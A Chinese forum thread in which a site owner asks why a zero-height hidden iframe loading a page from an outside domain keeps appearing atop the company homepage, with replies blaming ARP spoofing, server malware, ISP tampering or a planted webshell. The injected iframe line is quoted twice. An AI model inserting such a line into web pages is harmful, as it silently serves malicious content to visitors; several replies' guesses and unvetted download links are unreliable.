站点被黑,帮忙看看
公司网站首页打开后,在页面顶部总会有
<iframe src= 'http://j.56c.us/o.htm ' height=0 width=50> </iframe>
这么一段
我检查过这个页面包括的js 和 css文件,都有没有出现过j.56c.us
请教下各位有什么好办法,谢谢
[解决办法]
安全问题不清楚..
[解决办法]
服务器有病毒
造成站点加载时被更改
[解决办法]
这不是被黑,纯粹是病毒搞的.挺难杀的.
[解决办法]
arp漏洞攻击
[解决办法]
典型的ARP欺骗
[解决办法]
典型的ARP欺骗
让服务器商查看解决,是局域网内一台服务器这样,其他的也这样,绑定网卡可以解决
[解决办法]
服务器中毒了!
[解决办法]
病毒
[解决办法]
服务器 病毒?
或者楼主是 服务器 被 网络 运营商给 流氓了
现在 这样的 技术在电信提供商 已经很成熟了
对于访问的 可控网络的的内容 进行 实时修改
比如对你服务器 输出的 html添加 类似的脚本广告.
[解决办法]
中毒了把?
[解决办法]
哈
我机子也惨了
[解决办法]
叫电信运营商查查。流氓死了
[解决办法]
不懂
[解决办法]
还没解决啊。。帮你顶。。。
[解决办法]
不懂,帮顶一下
[解决办法]
看看进别的网站有没有被添加。比如163什么的大站
如果有,那么就是IE的一个漏洞,4月发布了新补丁
如果没有就是服务器。。。节哀~
[解决办法]
故障处理
1、中毒者:使用趋势科技ARP病毒专杀工具查杀病毒
下载后解压缩,运行包内TSC.exe文件,不要关让它一直运行完,最后查看report文档便知是否中毒。
http://www.wuzone.com/attachments/month_0704/z2007424161624.rar
2、被害者:使用AntiArp软件抵御ARP攻击
运行AntiArp。输入本网段的网关ip地址后,点击 "获取网关MAC地址 ",检查网关IP地址和MAC地址无误后,点击 "自动保护 "。若不知道网关IP地址,可通过以下操作获取:点击 "开始 "按钮-> 选择 "运行 "-> 输入 "cmd "点击 "确定 "-> 输入 "ipconfig "按回车, "Default Gateway "后的IP地址就是网关地址。AntiArp软件会在提示框内出现病毒主机的MAC地址。
http://www.wuzone.com/attachments/month_0704/u2007424161835.rar
[解决办法]
是服务器问题还是你浏览器问题呢
[解决办法]
这个病毒太无耻了
[解决办法]
第一检查程序漏洞
第二修改权限。如果是ASP程序就修改FSO名称和CLASSID可以杜绝这个病毒
[解决办法]
这叫ARP或中毒,简单是大言不惭。这样的攻击方法一般是通过后台或其他上传的模块,上个WebShell(ASP,PHP,JSP,ASP.NET等可对硬盘物理文件或系统权限操作的页面),而然后修改站点页挂马。一般修改被调用和比较多的页面,比如Head.asp之类的。
解决最好的办法是修改程序漏洞,同时对服务器做好相应权限设置,一般是很难通过WS修改网站页面的。
如再有不明白可联系 Q:77273364
[解决办法]
替换还是篡改!~
[解决办法]
把那段代码直接删掉不行吗 !!??
[解决办法]
写一段代码,如果出现那几行字,直接给删了~~
[解决办法]
不行,只要病毒存在,代码还是会被改成那样的。先考虑杀毒吧
[解决办法]
检查出现此句的页面所调用的所有js文件,应该会有 <iframe src= 'http://j.56c.us/o.htm ' height=0 width=50> </iframe> 这句话。好好找找。我遇到过。
[解决办法]
试试,写一个测试的站点,看看还有吗?
[解决办法]
典型的ARP欺骗
[解决办法]
看看是所有的文件都插入了代码,还是只有包含文件中插入了,如果是所有文件,那就不太好清理了
[解决办法]
木马,往你的aspx,html,htm,jsp等页面中加一段代码。。。。
用号称世界上最好的antivirus (名字忘了)杀杀。。。
